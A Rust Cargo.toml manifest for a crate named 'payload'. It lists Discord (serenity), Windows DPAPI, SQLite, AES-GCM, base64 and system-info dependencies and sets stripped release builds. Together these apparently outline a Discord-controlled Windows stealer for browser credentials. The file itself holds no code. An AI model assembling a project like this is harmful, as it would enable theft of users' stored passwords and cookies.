[package]
name = "payload"
version = "0.1.0"
edition = "2021"

[profile.release]
strip = true
lto = true

# See more keys and their definitions at https://doc.rust-lang.org/cargo/reference/manifest.html

[dependencies]
serenity = "0.11"
anyhow = "1.0.71"
tokio = { version = "1", features = ["full"] }
sysinfo = "0.29.0"
serde_json = "1.0"
base64 = "0.21.1"
winapi = { version = "0.3", features = ["dpapi"]}
uuid = { version = "1.1.2", features = ["v4"] }
rusqlite = { version = "0.27.0", features = ["bundled"] }
aes-gcm = "0.9.4"